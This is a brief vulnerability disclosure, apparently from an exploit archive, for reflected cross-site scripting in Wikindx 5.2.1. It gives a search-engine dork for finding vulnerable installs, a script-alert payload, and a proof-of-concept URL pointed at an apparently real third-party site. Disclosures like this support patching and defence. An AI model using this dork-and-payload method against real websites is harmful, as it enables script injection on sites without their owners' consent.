Wikindx version 5.2.1 suffers from a cross site scripting vulnerability.
fa0052bde3ea2d37d998c677aae7ee0a
============================================================================================================================
| # Title : Wikindx5.2.1 xss Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : http://www.wikindx.com/ |
| # Dork : "wikindx 5.2.1 A(c)2017 | " |
============================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] Use Payload : <script>alert(/indoushka/);</script>
http://www.hansdieterhiep.nl/wikindx/index.php?action=help_HELPMESSAGES_CORE&message=preferences<video><source onerror%3d"javascript:alert(/indoushka/)">
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================